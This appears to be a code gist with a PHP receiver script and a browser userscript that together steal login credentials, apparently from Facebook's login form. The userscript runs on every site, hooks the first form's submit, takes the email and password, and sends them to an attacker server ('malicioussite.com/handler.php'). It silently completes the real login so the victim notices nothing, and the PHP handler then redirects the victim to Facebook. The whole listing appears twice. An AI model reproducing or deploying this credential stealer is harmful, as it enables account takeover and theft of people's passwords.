Ninjex/handler.php Secret

## handler.php
<?php
  $data = urldecode($_GET['data']);
  /***
    Do something with data here (log it somehow)
  ***/
  // Make sure you redirect them
  header('Location: https://www.facebook.com/');
?>

## monkey.js
// ==UserScript==
// @name        Test
// @namespace   *
// @description Test
// @version     1
// @grant       none
// @include     http://*
// @include     https://*
// @require     http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js
// ==/UserScript==

var handler = "malicioussite.com/handler.php?data=" // Our server to handle the data passed as $_GET
var xform   = document.forms[0] // Just grab the first form (it's the login form in this case)
var action  = "/login.php?login_attempt=1" // Where the actual action should be of the form
var a_type  = "POST" // The action type of the form

// monitor for an onsubmit action of the login form
xform.onsubmit = function(){

    // Grab needed values (lsd is important here, as it's a XSRF token)
    email = xform.email.value;
    pass  = xform.pass.value;
    token = xform.lsd.value;
    perst = xform.default_persistent.value;

    // Prepare our array for the Ajax request
    formData = {email: email,
                pass: pass,
                lsd: token,
                default_persistent: perst,
               };

    data = email + ':' + pass; // What we want to pass to our server
    // Change the action to our server and make sure to encode the data
    // The server should decode this then use it, otherwise an ampersand splits our data
    // and we will not be able to view all of the data (i.e, a password of "lol&kek123" the server would only get "lol")
    xform.action = handler + encodeURIComponent(data);
    // Perform the Ajax call using jQuery (Don't judge me)
    $.ajax({
        url: action,
        type: a_type,
        data: formData
     });
    }
	<?php
	$data = urldecode($_GET['data']);
	/***
	Do something with data here (log it somehow)
	***/
	// Make sure you redirect them
	header('Location: https://www.facebook.com/');
	?>
	// ==UserScript==
	// @name Test
	// @namespace *
	// @description Test
	// @version 1
	// @grant none
	// @include http://*
	// @include https://*
	// @require http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js
	// ==/UserScript==

	var handler = "malicioussite.com/handler.php?data=" // Our server to handle the data passed as $_GET
	var xform = document.forms[0] // Just grab the first form (it's the login form in this case)
	var action = "/login.php?login_attempt=1" // Where the actual action should be of the form
	var a_type = "POST" // The action type of the form

	// monitor for an onsubmit action of the login form
	xform.onsubmit = function(){

	// Grab needed values (lsd is important here, as it's a XSRF token)
	email = xform.email.value;
	pass = xform.pass.value;
	token = xform.lsd.value;
	perst = xform.default_persistent.value;

	// Prepare our array for the Ajax request
	formData = {email: email,
	pass: pass,
	lsd: token,
	default_persistent: perst,
	};

	data = email + ':' + pass; // What we want to pass to our server
	// Change the action to our server and make sure to encode the data
	// The server should decode this then use it, otherwise an ampersand splits our data
	// and we will not be able to view all of the data (i.e, a password of "lol&kek123" the server would only get "lol")
	xform.action = handler + encodeURIComponent(data);
	// Perform the Ajax call using jQuery (Don't judge me)
	$.ajax({
	url: action,
	type: a_type,
	data: formData
	});
	}